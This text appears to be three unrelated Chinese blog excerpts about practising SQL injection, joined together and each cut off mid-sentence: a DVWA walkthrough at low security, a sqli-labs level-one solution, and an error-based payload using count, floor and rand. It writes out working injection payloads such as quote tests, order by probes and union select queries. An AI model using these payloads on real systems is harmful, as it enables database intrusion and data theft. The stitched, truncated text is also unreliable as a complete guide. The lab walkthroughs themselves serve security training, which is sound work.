DVWA学习之SQL注入 环境工具 dvwa 1.9 phpstudy firefox burpsuite 实验步骤 一.设置安全级别为LOW 1. 登录DVWA,并将安全级别设置为LOW 2. 进入SQL注入模块,并输入1,返回结果如下 3. 下面判断注入类型是字符型注入还是整数型注入 字符型注入的SQL语句形如 select * from xx where id='$id' 整数型注入的SQL语句形如 select * from xx where id=$id (1) 分别输入 1 and
学习sql注入的必做靶场我终于来尝试一下下了. 第一关 ?id=1'时出现 在测试?id=1' and '1'='1,页面正常 ?id=1' and '1'='2 页面错误 判断存在单引号字符型注入 判断列数 ?id=1' order by 3-- -时正常 ?id=1' order by 4-- -时错误 有3列 判断回显点 ?id=1' union select 1,2,3-- - 2,3可回显 后查库,查表,查列,查字段 ?id=-1' union select 1,2,databas
payload 1 Union select count(*),concat((查询语句),0x26,floor(rand(0)*2))x from information_schema.columns group by x; payload拆分讲解 1 count():count()函数返回匹配指定条件的行数.count(*)函数返回表中的记录数 2 floor():floor:函数是用来向下取整呢个的,相当于去掉小数部分 3 rand():rand()是随机取(0,1)中的一个数,但是